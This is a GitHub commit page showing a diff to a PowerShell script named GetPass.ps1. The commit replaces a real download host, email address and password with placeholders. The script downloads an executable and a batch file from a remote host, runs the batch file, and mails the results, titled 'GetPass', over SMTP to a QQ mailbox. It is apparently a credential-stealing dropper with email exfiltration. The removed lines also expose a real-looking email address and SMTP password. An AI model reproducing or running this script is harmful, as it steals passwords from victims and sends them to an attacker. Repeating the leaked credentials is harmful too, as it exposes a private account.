Skip to content

Commit

Permalink
Update GetPass.ps1
Browse files Browse the repository at this point in the history
  • Loading branch information
Xyntax committed Jan 11, 2016
1 parent 2c3bec0 commit b2ec0a3
Showing 1 changed file with 5 additions and 5 deletions.
10 changes: 5 additions & 5 deletions GetPass.ps1
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
(new-object System.Net.WebClient).DownloadFile('http://www.cdxy.me/GetPass.rar','D:\Get.exe');
(new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/GetPass.rar','D:\Get.exe');

(new-object System.Net.WebClient).DownloadFile('http://www.cdxy.me/Command.rar','D:\Command.bat');
(new-object System.Net.WebClient).DownloadFile('http://www.xxx.xxx/Command.rar','D:\Command.bat');

D:\Command.bat;
$SMTPServer = 'smtp.qq.com'
Expand All @@ -9,13 +9,13 @@ $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)

$SMTPInfo.EnableSsl = $true

$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('941335582@qq.com', 'olawgiwsvcimbdgf');
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxxx@qq.com', 'olawgxxxxxxx');

$ReportEmail = New-Object System.Net.Mail.MailMessage

$ReportEmail.From = '941335582@qq.com'
$ReportEmail.From = 'xxxxx@qq.com'

$ReportEmail.To.Add('941335582@qq.com')
$ReportEmail.To.Add('xxxxx@qq.com')

$ReportEmail.Subject = 'GetPass'

Expand Down

0 comments on commit b2ec0a3

Please sign in to comment.